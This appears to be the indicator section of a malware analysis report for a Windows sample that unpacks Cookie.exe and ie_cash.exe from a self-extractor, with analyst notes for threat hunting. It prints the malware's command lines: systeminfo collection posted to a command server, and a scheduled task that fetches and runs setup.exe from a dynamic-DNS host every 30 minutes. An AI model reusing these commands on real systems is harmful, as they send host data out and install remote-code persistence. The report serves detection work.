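Technical Information
(Observed indicators. The `#` runs in host names are masking present in the source, so those names cannot be matched literally. `<SYSTEM32>`, `%TEMP%`, `%APPDATA%` and `%HOMEPATH%` are path placeholders, not literal strings.)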
- '<SYSTEM32>\taskkill.exe' /f /im Cookie.exe
- %TEMP%\7ZipSfx.000\Cookies.cmd
- %TEMP%\7ZipSfx.000\Cookie.exe
- %TEMP%\7ZipSfx.000\dPbHUhQ
- %TEMP%\7ZipSfx.000\richtime.exe
- %APPDATA%\Microsoft\IE\ie_cash.exe
- 'da#####ice.zapto.org':80
- http://da#####ice.zapto.org/
- DNS ASK da#####ice.zapto.org
- ClassName: '' WindowName: ''
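- '%TEMP%\7ZipSfx.000\Cookie.exe' --post-data="versiya=arm_14.11&comp=CRNJEUFU&id=CRNJEUFU_88E6680F&sysinfo=Host Name: CRNJEUFU+###OS Name: Microsoft Windows XP Professional+###OS Version: ...
  (The command line is truncated in the source. The visible POST body carries the host name (`comp`), a per-host `id` and text in the format of `systeminfo` output, so `CRNJEUFU` and `88E6680F` are values from the analysis machine, not stable indicators.)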
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\7ZipSfx.000\Cookies.cmd" "
- '<SYSTEM32>\cmd.exe' /c vol c:
- '<SYSTEM32>\systeminfo.exe'
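- '<SYSTEM32>\schtasks.exe' /Create /SC MINUTE /MO 30 /F /tn ie_cash_88E6680F_01 /tr "%APPDATA%\Microsoft\IE\ie_cash.exe -b -c -t 5 'http://bi####min.ddns.net/CRNJEUFU_88E6680F/setup.exe' -P '%HOMEPATH%'"
  (Persistence: the scheduled task runs `ie_cash.exe` every 30 minutes, and `/F` replaces any existing task of the same name. The `88E6680F` part of the task name and the `CRNJEUFU_88E6680F` URL path repeat the `id` value from the `--post-data` line, so they presumably differ per host. When hunting, match on the `ie_cash_` task-name prefix and the `%APPDATA%\Microsoft\IE\ie_cash.exe` path rather than the full task name.)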